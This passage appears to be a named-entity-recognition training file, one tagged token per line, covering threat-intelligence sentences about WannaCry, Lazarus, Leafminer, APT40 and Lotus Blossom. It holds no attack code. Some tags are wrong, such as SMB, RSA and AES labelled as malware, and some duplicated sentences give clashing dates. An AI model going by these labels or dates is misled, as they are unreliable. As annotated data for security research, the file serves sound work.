+binary O +and O +encrypted O +files O +) O +has O +spread O +to O +at O +least O +74 O +countries O +as O +of O +Friday B-TIME +12 I-TIME +May I-TIME +2017 E-TIME +, O +reportedly O +targeting O +Russia S-LOC +initially O +, O +and O +spreading O +to O +telecommunications S-IDTY +, O +shipping S-IDTY +, O +car B-IDTY +manufacturers E-IDTY +, O +universities S-IDTY +and O +health B-IDTY +care I-IDTY +industries E-IDTY +, O +among O +others O +. 
O + +Ransomware O +that O +has O +been O +publicly O +named O +" O +WannaCry S-MAL +" O +, O +" O +WCry S-MAL +" O +or O +" O +WanaCrypt0r S-MAL +" O +( O +based O +on O +strings O +in O +the O +binary O +and O +encrypted O +files O +) O +has O +spread O +to O +at O +least O +74 O +countries O +as O +of O +Friday B-TIME +12 I-TIME +May I-TIME +2017 E-TIME +, O +reportedly O +targeting O +Russia S-LOC +initially O +, O +and O +spreading O +to O +telecommunications S-IDTY +, O +shipping S-IDTY +, O +car B-IDTY +manufacturers E-IDTY +, O +universities S-IDTY +and O +health B-IDTY +care I-IDTY +industries E-IDTY +, O +among O +others O +. O + +We O +also O +saw O +that O +the O +attack O +technique O +bears O +some O +resemblance O +to O +a O +previous O +2017 S-TIME +Lazarus B-ACT +attack E-ACT +, O +analyzed O +by O +BAE B-SECTEAM +Systems E-SECTEAM +, O +against O +targets O +in O +Asia S-LOC +. O + +WannaCry S-MAL +utilizes O +EternalBlue S-VULNAME +by O +crafting O +a O +custom O +SMB S-MAL +session O +request O +with O +hard-coded O +values O +based O +on O +the O +target O +system O +. O + +Notably O +, O +after O +the O +first O +SMB B-ACT +packet E-ACT +sent O +to O +the O +victim O +'s O +IP S-PROT +address O +, O +WannaCry S-MAL +sends O +two O +additional O +packets O +to O +the O +victim O +containing O +the O +hard-coded O +IP S-PROT +addresses O +192.168.56.20 O +and O +172.16.99.5 O +. O + +WannaCry S-MAL +( O +also O +known O +as O +WCry S-MAL +or O +WanaCryptor S-MAL +) O +malware O +is O +a O +self-propagating O +( O +worm-like O +) O +ransomware S-MAL +that O +spreads O +through O +internal O +networks O +and O +over O +the O +public O +internet O +by O +exploiting O +a O +vulnerability O +in O +Microsoft S-IDTY +'s O +Server B-TOOL +Message I-TOOL +Block E-TOOL +( O +SMB S-TOOL +) O +protocol O +, O +MS17-010 O +. 
O + +The O +WannaCry S-MAL +malware S-MAL +consists O +of O +two O +distinct O +components O +, O +one O +that O +provides O +ransomware O +functionality O +and O +a O +component O +used O +for O +propagation O +, O +which O +contains O +functionality O +to O +enable O +SMB S-MAL +exploitation O +capabilities O +. O + +WannaCry S-MAL +leverages O +an O +exploit S-VULNAME +, O +codenamed O +" O +EternalBlue S-VULNAME +" O +, O +that O +was O +released O +by O +the O +Shadow B-APT +Brokers E-APT +on O +April B-TIME +14 I-TIME +, I-TIME +2017 E-TIME +. O + +WannaCry S-MAL +appends O +encrypted O +data O +files O +with O +the O +.WCRY S-FILE +extension O +, O +drops O +and O +executes O +a O +decryptor O +tool O +, O +and O +demands O +$300 O +or O +$600 O +USD O +( O +via O +Bitcoin S-TOOL +) O +to O +decrypt O +the O +data O +. O + +In O +May B-TIME +2017 E-TIME +, O +SecureWorks® B-SECTEAM +Counter I-SECTEAM +Threat I-SECTEAM +Unit® E-SECTEAM +( O +CTU S-SECTEAM +) O +researchers O +investigated O +a O +widespread O +and O +opportunistic O +WCry S-MAL +( O +also O +known O +as O +WanaCry S-MAL +, O +WanaCrypt S-MAL +, O +and O +Wana B-MAL +Decrypt0r E-MAL +) O +ransomware B-ACT +campaign E-ACT +that O +impacted O +many O +systems O +around O +the O +world O +. O + +In O +November B-TIME +2017 E-TIME +, O +SecureWorks B-SECTEAM +Counter I-SECTEAM +Threat I-SECTEAM +Unit E-SECTEAM +( O +CTU S-SECTEAM +) O +researchers O +investigated O +a O +widespread O +and O +opportunistic O +WCry B-ACT +ransomware I-ACT +campaign E-ACT +that O +impacted O +many O +systems O +around O +the O +world O +. O + +Microsoft S-IDTY +addressed O +the O +SMBv1 S-TOOL +vulnerabilities S-VULNAME +in O +March B-TIME +2017 E-TIME +with O +Security O +Bulletin O +MS17-010 O +. O + +The O +worm O +leverages O +an O +SMBv1 B-TOOL +exploit S-VULNAME +that O +originates O +from O +tools O +released O +by O +the O +Shadow B-APT +Brokers E-APT +threat O +group O +in O +April S-TIME +. 
O + +If O +the O +DoublePulsar B-MAL +backdoor E-MAL +does O +not O +exist O +, O +then O +the O +SMB B-MAL +worm E-MAL +attempts O +to O +compromise O +the O +target O +using O +the O +Eternalblue S-VULNAME +SMBv1 S-TOOL +exploit S-VULNAME +. O + +WCry S-MAL +uses O +a O +combination O +of O +the O +RSA S-MAL +and O +AES S-MAL +algorithms O +to O +encrypt O +files O +. O + +The O +campaign O +'s O +use O +of O +an O +SMB B-MAL +worm E-MAL +to O +distribute O +WCry S-MAL +contributed O +to O +the O +ransomware O +'s O +virulence O +. O + +Last O +week O +Microsoft S-IDTY +, O +working O +together O +with O +Facebook S-IDTY +and O +others O +in O +the O +security B-SECTEAM +community E-SECTEAM +, O +took O +strong O +steps O +to O +protect O +our O +customers O +and O +the O +internet O +from O +ongoing O +attacks O +by O +an O +advanced O +persistent O +threat O +actor O +known O +to O +us O +as O +ZINC S-APT +, O +also O +known O +as O +the O +Lazarus B-APT +Group E-APT +. O + +Last O +week O +Microsoft S-IDTY +, O +working O +together O +with O +Facebook S-IDTY +, O +took O +strong O +steps O +to O +protect O +our O +customers O +and O +the O +internet O +from O +ongoing O +attacks O +by O +the O +Lazarus B-APT +Group E-APT +. O + +We O +concluded O +that O +Lazarus B-APT +Group E-APT +was O +responsible O +for O +WannaCry S-MAL +, O +a O +destructive O +malware O +. O + +We O +concluded O +that O +Lazarus B-APT +Group E-APT +was O +responsible O +for O +WannaCry S-MAL +, O +a O +destructive O +attack O +in O +May S-TIME +that O +targeted O +Microsoft B-IDTY +customers E-IDTY +. O + +Today O +, O +the O +governments S-IDTY +of O +the O +United B-LOC +States E-LOC +, O +United B-LOC +Kingdom E-LOC +, O +Australia S-LOC +, O +Canada S-LOC +, O +New B-LOC +Zealand E-LOC +and O +Japan S-LOC +have O +all O +announced O +that O +the O +government O +of O +North B-LOC +Korea E-LOC +is O +responsible O +for O +the O +activities S-ACT +of O +ZINC/Lazarus S-APT +. 
O + +In O +November B-TIME +2017 E-TIME +, O +Secureworks B-SECTEAM +Counter I-SECTEAM +Threat I-SECTEAM +Unit™ E-SECTEAM +( O +CTU S-SECTEAM +) O +researchers O +discovered O +the O +North B-LOC +Korean E-LOC +cyber O +threat O +group O +, O +known O +as O +Lazarus B-APT +Group E-APT +and O +internally O +tracked O +as O +NICKEL B-APT +ACADEMY E-APT +by O +Secureworks S-SECTEAM +, O +had O +launched O +a O +malicious B-ACT +spearphishing I-ACT +campaign E-ACT +using O +the O +lure O +of O +a O +job O +opening O +for O +the O +CFO O +role O +at O +a O +European-based S-LOC +cryptocurrency B-IDTY +company E-IDTY +. O + +In O +November B-TIME +2017 E-TIME +, O +CTU S-SECTEAM +researchers O +discovered O +the O +North B-LOC +Korean E-LOC +cyber O +threat O +group O +, O +known O +as O +Lazarus B-APT +Group E-APT +, O +had O +launched O +a O +malicious B-ACT +spearphishing I-ACT +campaign E-ACT +using O +the O +lure O +of O +a O +job O +opening O +for O +the O +CFO O +role O +at O +a O +European-based S-LOC +cryptocurrency B-IDTY +company E-IDTY +. O + +Bankshot S-MAL +is O +designed O +to O +persist O +on O +a O +victim O +'s O +network O +for O +further O +exploitation O +; O +thus O +the O +Advanced B-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +team O +believes O +this O +operation O +is O +intended O +to O +gain O +access O +to O +specific O +financial B-IDTY +organizations E-IDTY +. O + +CTU S-SECTEAM +researchers O +assess O +this O +as O +the O +continuation O +of O +activity O +first O +observed O +in O +2016 S-TIME +, O +and O +it O +is O +likely O +that O +the O +campaign O +is O +ongoing O +. O + +CTU S-SECTEAM +researchers O +have O +observed O +NICKEL B-APT +ACADEMY E-APT +( O +Lazarus S-APT +) O +copying O +and O +pasting O +job O +descriptions O +from O +online O +recruitment O +sites O +in O +previous O +campaigns S-ACT +. 
O + +There O +are O +several O +indicators O +, O +which O +have O +led O +CTU S-SECTEAM +researchers O +to O +believe O +with O +high O +confidence O +that O +NICKEL B-APT +ACADEMY E-APT +is O +behind O +the O +current O +spearphishing B-ACT +campaign E-ACT +. O + +CTU S-SECTEAM +researchers O +also O +identified O +components O +in O +the O +custom B-MAL +C2 I-MAL +protocol E-MAL +being O +used O +which O +they O +have O +seen O +utilized O +by O +Nickel B-APT +Academy E-APT +( O +Lazarus S-APT +) O +previously O +. O + +CTU S-SECTEAM +researchers O +also O +identified O +components O +in O +the O +custom B-MAL +C2 I-MAL +protocol E-MAL +being O +used O +( O +the O +ACT O +in O +which O +the O +malware O +talks O +to O +the O +Command O +and O +Control O +Servers O +) O +which O +they O +have O +seen O +utilized O +by O +Nickel B-APT +Academy E-APT +( O +Lazarus S-APT +) O +previously O +. O + +Leafminer S-APT +attempts O +to O +infiltrate O +target O +networks O +through O +various O +means O +of O +intrusion O +: O +watering B-ACT +hole E-ACT +websites O +, O +vulnerability O +scans O +of O +network B-ACT +services E-ACT +on O +the O +internet O +, O +and O +brute-force B-ACT +login E-ACT +attempts O +. O + +The O +researchers O +found O +that O +there O +are O +common O +elements O +in O +the O +macro O +and O +in O +the O +first- O +stage O +RAT S-MAL +used O +in O +this O +campaign O +, O +with O +former O +campaigns S-ACT +of O +the O +NICKEL B-APT +ACADEMY E-APT +( O +Lazarus S-APT +) O +threat O +group O +. O + +During O +our O +investigation O +, O +there O +was O +a O +breakthrough O +discovery O +that O +helped O +connect O +Leafminer S-APT +to O +a O +number O +of O +attacks O +observed O +on O +systems O +in O +the O +Middle B-LOC +East E-LOC +and O +identify O +the O +toolkit O +used O +in O +the O +group O +'s O +efforts O +of O +intrusion O +, O +lateral O +movement O +, O +and O +Exfiltration S-ACT +. 
O + +As O +of O +early B-TIME +June I-TIME +2018 E-TIME +, O +the O +server O +hosted O +112 O +files O +in O +a O +subdirectory O +that O +could O +be O +accessed O +through O +a O +public B-MAL +web I-MAL +shell E-MAL +planted O +by O +the O +Leafminer S-APT +. O + +As O +of O +early B-TIME +June I-TIME +2018 E-TIME +, O +the O +server O +hosted O +112 O +files O +in O +a O +subdirectory O +that O +could O +be O +accessed O +through O +a O +public B-MAL +web I-MAL +shell E-MAL +planted O +by O +the O +attackers S-APT +. O + +The O +Leafminer S-APT +'s O +post-compromise O +toolkit O +suggests O +that O +Leafminer S-APT +is O +looking O +for O +email S-TOOL +data O +, O +files O +, O +and O +database O +servers O +on O +compromised O +target O +systems O +. O + +Researching O +the O +hacker S-APT +handle O +MagicCoder O +results O +in O +references O +to O +the O +Iranian S-LOC +hacking O +forum O +Ashiyane S-APT +as O +well O +as O +defacements O +by O +the O +Iranian S-LOC +hacker O +group O +Sun B-APT +Army E-APT +. O + +Targeted O +regions O +included O +in O +the O +list O +of O +Leafminer S-APT +are O +Saudi B-LOC +Arabia E-LOC +, O +United B-LOC +Arab I-LOC +Emirates E-LOC +, O +Qatar S-LOC +, O +Kuwait S-LOC +, O +Bahrain S-LOC +, O +Egypt S-LOC +, O +Israel S-LOC +, O +and O +Afghanistan S-LOC +. O + +Our O +investigation O +of O +Leafminer S-APT +started O +with O +the O +discovery O +of O +JavaScript B-MAL +code E-MAL +on O +several O +compromised B-MAL +websites E-MAL +in O +the O +Middle B-LOC +East E-LOC +. O + +This O +included O +the O +Fuzzbunch S-MAL +framework O +that O +was O +part O +of O +an O +infamous O +leak O +of O +exploits O +and O +tools O +by O +the O +Shadow B-APT +Brokers E-APT +in O +April B-TIME +2017 E-TIME +. 
O + +Leafminer S-APT +has O +developed O +exploit S-VULNAME +payloads O +for O +this O +framework O +( O +Table O +2 O +) O +that O +deliver O +custom O +malware O +through O +attacks O +against O +SMB S-TOOL +vulnerabilities S-VULNAME +described O +by O +Microsoft S-IDTY +. O + +The O +EternalBlue S-VULNAME +exploits S-VULNAME +from O +the O +framework O +received O +worldwide O +attention O +after O +being O +used O +in O +the O +ransomware B-ACT +campaigns I-ACT +WannaCry E-ACT +in O +May S-TIME +and O +Petya S-MAL +/ O +NotPetya S-MAL +in O +June B-TIME +2017 E-TIME +. O + +The O +Leafminer S-APT +operators S-APT +use O +EternalBlue S-VULNAME +to O +attempt O +lateral O +movement O +within O +target O +networks O +from O +compromised O +staging O +servers O +. O + +Symantec S-SECTEAM +also O +observed O +attempts O +by O +Leafminer S-APT +to O +scan O +for O +the O +Heartbleed B-VULNAME +vulnerability E-VULNAME +( O +CVE-2014-0160 S-VULID +) O +from O +an O +attacker-controlled O +IP S-PROT +address O +. O + +Furthermore O +, O +the O +Leafminer S-APT +arsenal O +server O +hosted O +a O +Python B-MAL +script E-MAL +to O +scan O +for O +this O +vulnerability O +. O + +Another O +intrusion O +approach O +used O +by O +Leafminer S-APT +seems O +a O +lot O +less O +sophisticated O +than O +the O +previously O +described O +methods O +but O +can O +be O +just O +as O +effective O +: O +using O +specific O +hacktools S-MAL +to O +guess O +the O +login O +passwords O +for O +services O +exposed O +by O +a O +targeted O +system O +. 
O + +Commands O +found O +in O +a O +readme O +text O +that O +was O +stored O +in O +a O +ZIP O +archive O +together O +with O +the O +hacktool O +THC B-MAL +Hydra E-MAL +in O +Leafminer S-APT +'s O +tool O +arsenal O +represent O +online B-ACT +dictionary I-ACT +attacks E-ACT +on O +Microsoft S-IDTY +Exchange O +and O +Remote O +Desktop O +Protocol O +services O +of O +regional O +government O +servers O +in O +Saudi B-LOC +Arabia E-LOC +. O + +Symantec S-SECTEAM +identified O +two O +strains O +of O +custom O +malware O +used O +by O +the O +Leafminer B-APT +group E-APT +: O +Trojan.Imecab S-MAL +and O +Backdoor.Sorgu S-MAL +. O + +Leafminer S-APT +is O +a O +highly O +active O +group O +, O +responsible O +for O +targeting O +a O +range O +of O +organizations O +across O +the O +Middle B-LOC +East E-LOC +. O + +Leafminer S-APT +appears O +to O +be O +based O +in O +Iran S-LOC +and O +seems O +to O +be O +eager O +to O +learn O +from O +and O +capitalize O +on O +tools O +and O +techniques O +used O +by O +more O +advanced O +threat O +actors S-APT +. O + +Leafminer S-APT +also O +utilized O +Process B-ACT +Doppelganging E-ACT +, O +a O +detection O +evasion O +technique O +first O +discussed O +at O +the O +Black O +Hat O +EU O +conference O +last O +year O +. O + +Dragos S-SECTEAM +has O +identified O +Leafminer B-APT +group E-APT +targeting O +access O +operations O +in O +the O +electric B-IDTY +utility I-IDTY +sector E-IDTY +. O + +Analysis O +of O +RASPITE S-APT +tactics O +, O +techniques O +, O +and O +procedures O +( O +TTPs O +) O +indicate O +the O +group O +has O +been O +active O +in O +some O +form O +since O +early O +- O +to O +mid-2017 S-TIME +. O + +RASPITE S-APT +targeting O +includes O +entities O +in O +the O +US S-LOC +, O +Middle B-LOC +East E-LOC +, O +Europe S-LOC +, O +and O +East B-LOC +Asia E-LOC +. 
O + +RASPITE S-APT +overlaps O +significantly O +with O +Symantec S-SECTEAM +'s O +Leafminer S-APT +, O +which O +recently O +released O +a O +report O +on O +the O +group O +'s O +activity O +in O +the O +Middle B-LOC +East E-LOC +. O + +RASPITE S-APT +'s O +activity O +to O +date O +currently O +focuses O +on O +initial O +access O +operations O +within O +the O +electric B-IDTY +utility I-IDTY +sector E-IDTY +. O + +This O +means O +that O +the O +Leafminer B-APT +group E-APT +is O +targeting O +electric B-IDTY +utilities E-IDTY +. O + +While O +the O +group O +has O +not O +yet O +demonstrated O +an O +ICS S-MAL +capability O +, O +RASPITE S-APT +'s O +recent O +targeting O +focus O +and O +methodology O +are O +clear O +indicators O +of O +necessary O +activity O +for O +initial O +intrusion O +operations O +into O +an O +IT S-IDTY +network O +to O +prepare O +the O +ACT O +for O +later O +potential O +ICS S-MAL +events O +. O + +Active O +since O +at O +least O +2014 S-TIME +, O +this O +actor S-APT +has O +long-standing O +interest O +in O +maritime B-IDTY +industries E-IDTY +, O +naval B-IDTY +defense I-IDTY +contractors E-IDTY +, O +and O +associated O +research B-IDTY +institutions E-IDTY +in O +the O +United B-LOC +States E-LOC +and O +Western B-LOC +Europe E-LOC +. O + +Active O +since O +at O +least O +2014 S-TIME +, O +the O +Leviathan S-APT +has O +long-standing O +interest O +in O +maritime B-IDTY +industries E-IDTY +, O +naval B-IDTY +defense I-IDTY +contractors E-IDTY +, O +and O +associated O +research B-IDTY +institutions E-IDTY +in O +the O +United B-LOC +States E-LOC +and O +Western B-LOC +Europe E-LOC +. 
O + +On O +September B-TIME +15 E-TIME +and O +19 B-TIME +, I-TIME +2017 E-TIME +, O +Proofpoint S-SECTEAM +detected O +and O +blocked O +spearphishing B-ACT +emails S-TOOL +from O +this O +group O +targeting O +a O +US S-LOC +shipbuilding B-IDTY +company E-IDTY +and O +a O +US S-LOC +university O +research O +center O +with O +military S-IDTY +ties O +. O + +The O +attachments O +exploited O +CVE-2017-8759 S-VULID +which O +was O +discovered O +and O +documented O +only O +five O +days O +prior O +to O +the O +campaign O +. O + +Some O +of O +the O +documents S-FILE +exploited O +CVE-2017-0199 S-VULID +to O +deliver O +the O +payload O +. O + +Between O +August B-TIME +2 E-TIME +and O +4 E-TIME +, O +the O +actor S-APT +sent O +targeted O +spearphishing B-ACT +emails S-TOOL +containing O +malicious O +URLs O +linking O +to O +documents O +to O +multiple O +defense B-IDTY +contractors E-IDTY +. O + +Between O +August B-TIME +2 E-TIME +and O +4 E-TIME +, O +the O +Leviathan S-APT +sent O +targeted O +spearphishing B-ACT +emails S-TOOL +containing O +malicious O +URLs O +linking O +to O +documents O +to O +multiple O +defense B-IDTY +contractors E-IDTY +. O + +The O +Leviathan S-APT +also O +occasionally O +used O +macro-laden B-FILE +Microsoft I-FILE +Word I-FILE +documents E-FILE +to O +target O +other O +US S-LOC +research O +and O +development B-IDTY +organizations E-IDTY +during O +this O +period O +. O + +The O +period O +between O +November B-TIME +2014 E-TIME +and O +January B-TIME +2015 E-TIME +marked O +one O +of O +the O +earlier O +instances O +in O +which O +Proofpoint S-SECTEAM +observed O +persistent O +exploitation O +attempts O +by O +this O +actor S-APT +. O + +The O +Leviathan S-APT +, O +whose O +espionage B-ACT +activities E-ACT +primarily O +focus O +on O +targets O +in O +the O +US S-LOC +and O +Western B-LOC +Europe E-LOC +with O +military S-IDTY +ties O +, O +has O +been O +active O +since O +at O +least O +2014 S-TIME +. 
O + +This O +actor S-APT +, O +whose O +espionage B-ACT +activities E-ACT +primarily O +focus O +on O +targets O +in O +the O +US S-LOC +and O +Western B-LOC +Europe E-LOC +with O +military S-IDTY +ties O +, O +has O +been O +active O +since O +at O +least O +2014 S-TIME +. O + +The O +campaign O +is O +linked O +to O +a O +group O +of O +suspected O +Chinese S-LOC +cyber B-APT +espionage I-APT +actors E-APT +we O +have O +tracked O +since O +2013 S-TIME +, O +dubbed O +TEMP.Periscope S-APT +. O + +The O +Leviathan S-APT +generally O +emailed O +Microsoft B-ACT +Excel I-ACT +documents E-ACT +with O +malicious O +macros O +to O +US S-LOC +universities S-IDTY +with O +military S-IDTY +interests O +, O +most O +frequently O +related O +to O +the O +Navy S-IDTY +. O + +The O +current O +campaign O +is O +a O +sharp O +escalation O +of O +detected O +activity O +since O +summer B-TIME +2017 E-TIME +. O + +Since O +early B-TIME +2018 E-TIME +, O +FireEye S-SECTEAM +( O +including O +our O +FireEye S-SECTEAM +as O +a O +Service O +( O +FaaS S-SECTEAM +) O +, O +Mandiant B-SECTEAM +Consulting E-SECTEAM +, O +and O +iSIGHT B-SECTEAM +Intelligence E-SECTEAM +teams O +) O +has O +been O +tracking O +an O +ongoing O +wave O +of O +intrusions O +targeting O +engineering S-IDTY +and O +maritime B-IDTY +entities E-IDTY +, O +especially O +those O +connected O +to O +South B-LOC +China I-LOC +Sea E-LOC +issues O +. O + +Known O +targets O +of O +the O +Leviathan S-APT +have O +been O +involved O +in O +the O +maritime B-IDTY +industry E-IDTY +, O +and O +research B-IDTY +institutes E-IDTY +, O +academic B-IDTY +organizations E-IDTY +, O +and O +private B-IDTY +firms E-IDTY +in O +the O +United B-LOC +States E-LOC +. 
O + +Active O +since O +at O +least O +2013 S-TIME +, O +TEMP.Periscope S-APT +has O +primarily O +focused O +on O +maritime-related O +targets O +across O +multiple O +verticals O +, O +including O +engineering B-IDTY +firms E-IDTY +, O +shipping S-IDTY +and O +transportation S-IDTY +, O +manufacturing S-IDTY +, O +defense S-IDTY +, O +government B-IDTY +offices E-IDTY +, O +and O +research B-IDTY +universities E-IDTY +. O + +TEMP.Periscope S-APT +overlaps O +in O +targeting O +, O +as O +well O +as O +tactics O +, O +techniques O +, O +and O +procedures O +( O +TTPs O +) O +, O +with O +TEMP.Jumper S-APT +, O +a O +group O +that O +also O +overlaps O +significantly O +with O +public O +reporting O +on O +NanHaiShu S-MAL +. O + +The O +actor S-APT +has O +conducted O +operations O +since O +at O +least O +2013 S-TIME +in O +support O +of O +China S-LOC +'s O +naval O +modernization O +effort O +. O + +FireEye S-SECTEAM +is O +highlighting O +a O +Cyber B-ACT +Espionage E-ACT +operation O +targeting O +crucial O +technologies O +and O +traditional O +intelligence O +targets O +from O +a O +China-nexus S-LOC +state O +sponsored O +actor S-APT +we O +call O +APT40 S-APT +. O + +The O +Leviathan B-APT +group E-APT +has O +specifically O +targeted O +engineering S-IDTY +, O +transportation S-IDTY +, O +and O +the O +defense B-IDTY +industry E-IDTY +, O +especially O +where O +these O +sectors O +overlap O +with O +maritime O +technologies O +. O + +We O +believe O +APT40 S-APT +'s O +emphasis O +on O +maritime O +issues O +and O +naval B-IDTY +technology E-IDTY +ultimately O +support O +China S-LOC +'s O +ambition O +to O +establish O +a O +blue-water O +navy O +. O + +Within O +a O +year O +APT40 S-APT +was O +observed O +masquerading O +as O +a O +UUV O +manufacturer O +, O +and O +targeting O +universities S-IDTY +engaged O +in O +naval O +research O +. 
O + +APT40 S-APT +engages O +in O +broader O +regional O +targeting O +against O +traditional O +intelligence O +targets O +, O +especially O +organizations O +with O +operations O +in O +Southeast B-LOC +Asia E-LOC +. O + +We O +assess O +with O +moderate O +confidence O +that O +APT40 S-APT +is O +a O +state-sponsored O +Chinese S-LOC +Cyber B-ACT +Espionage E-ACT +operation O +. O + +The O +actor S-APT +'s O +targeting O +is O +consistent O +with O +Chinese S-LOC +state O +interests O +and O +there O +are O +multiple O +technical O +artifacts O +indicating O +the O +actor S-APT +is O +based O +in O +China S-LOC +. O + +Analysis O +of O +the O +operational O +times O +of O +the O +group O +'s O +activities S-ACT +indicates O +that O +it O +is O +probably O +centered O +around O +China S-LOC +Standard O +TIME O +( O +UTC O ++8 O +) O +. O + +APT40 S-APT +relies O +heavily O +on O +web B-MAL +shells E-MAL +for O +an O +initial O +foothold O +into O +an O +organization O +. O + +APT40 S-APT +has O +been O +observed O +leveraging O +a O +variety O +of O +techniques O +for O +initial O +compromise O +, O +including O +web O +server O +exploitation O +, O +phishing B-ACT +campaigns E-ACT +delivering O +publicly O +available O +and O +custom O +backdoors O +, O +and O +strategic B-ACT +web I-ACT +compromises E-ACT +. O + +Depending O +on O +placement O +, O +a O +Web B-TOOL +shell E-TOOL +can O +provide O +continued O +access O +to O +victims O +' O +environments O +, O +re-infect O +victim O +systems O +, O +and O +facilitate O +lateral O +movement O +. O + +The O +group O +'s O +capabilities O +are O +more O +than O +the O +much O +discussed O +CVE-2012-0158 S-VULID +exploits O +over O +the O +past O +few O +years O +. 
O + +A O +paper O +released O +today O +by O +our O +colleagues O +at O +Palo B-SECTEAM +Alto I-SECTEAM +Networks E-SECTEAM +presented O +a O +portion O +of O +data O +on O +this O +crew O +under O +the O +label O +" O +the O +Lotus B-ACT +Blossom I-ACT +Operation E-ACT +" O +, O +likely O +named O +for O +the O +debug O +string O +present O +in O +much O +of O +the O +" O +Elise S-MAL +" O +codebase O +since O +at O +least O +2012 S-TIME +: O +" O +d:\lstudio\projects\lotus\… O +" O +. O + +Instead O +, O +the O +Spring B-APT +Dragon I-APT +group E-APT +is O +known O +to O +have O +employed O +spearphish S-ACT +exploits S-VULNAME +, O +strategic B-ACT +web I-ACT +compromises E-ACT +, O +and O +watering B-ACT +holes I-ACT +attack E-ACT +. O + +The O +group O +'s O +spearphish O +toolset O +includes O +PDF S-TOOL +exploits S-VULNAME +, O +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +exploits S-VULNAME +, O +and O +the O +common O +CVE-2012-0158 S-VULID +Word S-TOOL +exploits S-VULNAME +including O +those O +generated O +from O +the O +infamous O +" O +Tran B-MAL +Duy I-MAL +Linh E-MAL +" O +kit O +. O + +The O +Spring B-APT +Dragon E-APT +appears O +to O +have O +rolled O +out O +a O +steady O +mix O +of O +exploits O +against O +government-related B-IDTY +organizations E-IDTY +in O +VN S-LOC +, O +TW S-LOC +, O +PH S-LOC +, O +and O +other O +locations O +over O +the O +past O +few O +years O +. O + +Organizations O +located O +in O +Myanmar S-LOC +and O +targeted O +by O +Spring B-APT +Dragon E-APT +have O +gone O +unmentioned O +. O + +Spring B-APT +Dragon E-APT +'s O +infiltration O +techniques O +there O +were O +not O +simply O +spearphish S-ACT +. 
O + +The O +download O +name O +was O +" O +Zawgyi_Keyboard_L.zip S-FILE +" O +, O +and O +it O +dropped O +a O +" O +setup.exe S-FILE +" O +that O +contained O +several O +backdoor O +components O +, O +including O +an O +Elise S-MAL +" O +wincex.dll S-FILE +" O +( O +a42c966e26f3577534d03248551232f3 S-MD5 +, O +detected O +as O +Backdoor.Win32.Agent.delp S-MAL +) O +. O + +While O +this O +particular O +actor S-APT +effectively O +used O +their O +almost O +worn O +out O +CVE-2012-0158 S-VULID +exploits O +in O +the O +past O +, O +Spring B-APT +Dragon E-APT +employs O +more O +involved O +and O +creative O +intrusive O +activity O +as O +well O +. O + +The O +well-known O +threat O +group O +called O +DRAGONFISH S-APT +or O +Lotus B-APT +Blossom E-APT +are O +distributing O +a O +new O +form O +of O +Elise S-MAL +malware S-MAL +targeting O +organizations O +for O +espionage S-ACT +purposes O +. O + +The O +threat O +actors S-APT +associated O +with O +DRAGONFISH S-APT +have O +previously O +focused O +their O +campaigns S-ACT +on O +targets O +in O +Southeast B-LOC +Asia E-LOC +, O +specifically O +those O +located O +in O +countries O +near O +the O +South B-LOC +China I-LOC +Sea E-LOC +. O + +iDefense S-SECTEAM +analysts O +have O +identified O +a O +campaign O +likely O +to O +be O +targeting O +members O +of— O +or O +those O +with O +affiliation O +or O +interest O +in—the O +ASEAN O +Defence B-IDTY +Ministers I-IDTY +' I-IDTY +Meeting E-IDTY +( O +ADMM S-IDTY +) O +. O + +iDefense S-SECTEAM +analysts O +have O +identified O +a O +campaign O +likely O +to O +be O +targeting O +members O +of O +or O +those O +with O +affiliation O +or O +interest O +in O +the O +ASEAN B-IDTY +Defence I-IDTY +Minister I-IDTY +'s I-IDTY +Meeting E-IDTY +( O +ADMM S-IDTY +) O +. 
O + +iDefense S-SECTEAM +assesses O +with O +high O +confidence O +that O +this O +campaign O +is O +associated O +with O +the O +threat O +group O +DRAGONFISH S-APT +( O +also O +known O +as O +Lotus B-APT +Blossom E-APT +and O +Spring B-APT +Dragon E-APT +) O +. O + +To O +mitigate O +the O +threat O +of O +the O +described O +campaign O +, O +security O +teams O +can O +consider O +blocking O +access O +to O +the O +C2 S-TOOL +server O +103.236.150.14 O +and O +, O +where O +applicable O +, O +ensure O +that O +the O +Microsoft S-IDTY +Security O +Update O +KB2553204 O +is O +installed O +in O +order O +to O +patch O +the O +CVE-2017-11882 S-VULID +vulnerability O +. O + +The O +actors S-APT +attempted O +to O +exploit S-VULNAME +CVE-2014-6332 S-VULID +using O +a O +slightly O +modified O +version O +of O +the O +proof-of-concept O +( O +POC O +) O +code O +to O +install O +a O +Trojan S-MAL +called O +Emissary S-MAL +, O +which O +is O +related O +to O +the O +Operation B-ACT +Lotus I-ACT +Blossom I-ACT +campaign E-ACT +. O + +The O +targeting O +of O +this O +individual S-IDTY +suggests O +the O +actors S-APT +are O +interested O +in O +breaching O +the O +French O +Ministry O +of O +Foreign O +Affairs O +itself O +or O +gaining O +insights O +into O +relations O +between O +France S-LOC +and O +Taiwan S-LOC +. O + +On O +November B-TIME +10 I-TIME +, I-TIME +2015 E-TIME +, O +threat O +actors S-APT +sent O +a O +spear-phishing S-ACT +email E-ACT +to O +an O +individual S-IDTY +at O +the O +French O +Ministry O +of O +Foreign O +Affairs O +. O + +On O +November B-TIME +10 I-TIME +, I-TIME +2015 E-TIME +, O +Lotus B-APT +Blossom E-APT +sent O +a O +spear-phishing S-ACT +email E-ACT +to O +an O +individual S-IDTY +at O +the O +French O +Ministry O +of O +Foreign O +Affairs O +. 
O + +Both O +attachments O +are O +malicious B-FILE +Word I-FILE +documents E-FILE +that O +attempt O +to O +exploit S-VULNAME +the O +Windows S-OS +OLE B-TOOL +Automation I-TOOL +Array I-TOOL +Remote I-TOOL +Code I-TOOL +Execution E-TOOL +Vulnerability S-VULNAME +tracked O +by O +CVE-2014-6332 S-VULID +. O + +Lotus B-APT +Blossom E-APT +attempted O +to O +exploit S-VULNAME +CVE-2014-6332 S-VULID +using O +the O +POC O +code O +available O +in O +the O +wild O +. O + +This O +Trojan S-MAL +is O +related O +to O +the O +Elise B-MAL +backdoor E-MAL +described O +in O +the O +Operation B-ACT +Lotus I-ACT +Blossom E-ACT +report O +. O + +Lotus B-APT +Blossom E-APT +was O +attempting O +to O +exploit S-VULNAME +CVE-2014-6332 S-VULID +to O +install O +a O +new O +version O +of O +the O +Emissary B-MAL +Trojan E-MAL +, O +specifically O +version O +5.3 O +. O + +APT B-APT +threat I-APT +actors E-APT +, O +most O +likely O +nation O +state-sponsored O +, O +targeted O +a O 